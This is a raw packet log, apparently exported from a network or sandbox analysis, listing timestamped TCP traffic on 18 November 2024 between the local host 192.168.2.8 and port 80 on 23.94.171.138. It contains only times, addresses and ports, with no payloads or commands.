                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.628895998 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.678257942 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.744565964 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.744611025 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.744637012 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.744649887 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.744661093 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.744663954 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.744693995 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.745315075 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.745341063 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.745352983 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.745369911 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.745393991 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.745471001 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.745484114 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.745526075 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.745896101 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.745986938 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.745999098 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.746011972 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.746031046 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.746048927 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.863621950 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.863648891 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.863662004 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.863675117 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.863687038 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.863702059 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.863702059 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.863729000 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.863754988 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.863883972 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.863919020 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.863930941 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.863965034 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.864012957 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.864025116 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.864036083 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.864061117 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.864077091 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.865092039 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.912626028 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.980071068 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.980109930 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.980153084 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.980176926 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.980182886 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.980215073 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.980226994 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.980237961 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.980268002 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.980276108 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.980359077 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.980375051 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.980391026 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.980398893 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.980431080 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.981143951 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.981187105 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.981199026 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.981231928 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.981344938 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.981355906 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.981396914 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.097002029 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.097052097 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.097064972 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.097100019 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.097131014 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.097146988 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.097173929 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.097206116 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.097218037 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.097256899 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.097805023 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.097852945 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.097872972 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.097884893 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.097934008 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.097965002 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.097976923 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.098015070 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.098336935 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.098382950 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.098395109 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.098422050 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.098465919 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.098504066 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.214236975 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.214303017 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.214323997 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.214337111 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.214351892 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.214436054 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.214474916 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.214489937 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.214530945 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.214533091 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.214595079 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.214621067 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.214632988 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.214689016 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.215132952 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.215204000 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.215218067 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.215264082 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.215305090 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.215334892 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.215349913 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.215359926 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.215403080 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.332263947 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.332283974 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.332298040 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.332385063 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.332398891 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.332415104 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.332487106 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.332506895 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.332506895 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.332732916 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.332786083 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.332801104 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.332829952 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.332968950 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.333028078 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.333040953 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.333054066 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.333091974 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.333334923 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.333403111 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.333416939 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.333437920 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.333477974 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.333492041 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.333534956 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.375895977 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.376095057 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.376135111 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.428426981 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.450027943 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.450057983 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.450090885 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.450107098 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.450138092 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.450150013 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.450175047 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.450210094 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.450232983 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.450299025 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.450309992 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.450347900 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.450427055 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.450476885 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.450479031 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.450488091 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.450522900 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.450597048 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.451148033 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.451179981 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.451208115 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.495820999 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.495896101 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.495908976 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.495955944 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.495985031 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.566625118 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.566669941 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.566683054 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.566715002 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.566867113 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.566880941 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.566893101 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.566903114 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.566906929 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.566934109 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.567032099 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.567043066 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.567054987 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.567090034 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.567106962 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.567132950 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.567145109 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.567159891 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.567178965 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.567658901 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.567703962 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.567706108 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.567718983 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.567754984 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.607919931 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.607947111 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.608076096 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.610204935 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.610250950 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.610264063 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.610310078 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.662621021 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.684113979 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.684150934 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.684164047 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.684204102 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.684226036 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.684273005 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.684310913 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.684324026 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.684360027 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.684366941 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.684528112 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.684540987 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.684571981 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.684617043 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.684628963 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.684640884 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.684662104 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.684705019 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.685138941 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.685153008 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.685194969 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.685436010 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.727294922 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.727344990 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.727354050 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.727358103 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.727401018 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.727410078 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.727422953 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.727458000 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.727477074 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.772053003 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.800896883 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.800945044 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.800959110 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.801012993 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.801035881 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.801074982 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.801194906 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.801218987 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.801263094 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.801296949 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.801310062 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.801350117 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.801424980 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.801435947 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.801449060 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.801462889 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.801491022 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.801505089 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.802001953 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.802066088 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.802078009 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.802110910 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.844712973 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.844779968 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.844790936 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.844837904 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.844842911 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.844851017 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.844862938 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.844887018 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.844913960 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.845002890 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.845046043 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.845051050 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.897032976 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.942456961 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.942503929 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.942517042 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.942565918 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.942578077 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.942588091 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.942595005 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.942662001 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.942688942 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.942960024 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.943010092 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.943033934 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.943054914 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.943073034 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.943146944 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.943159103 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.943170071 CET805564823.94.171.138192.168.2.8
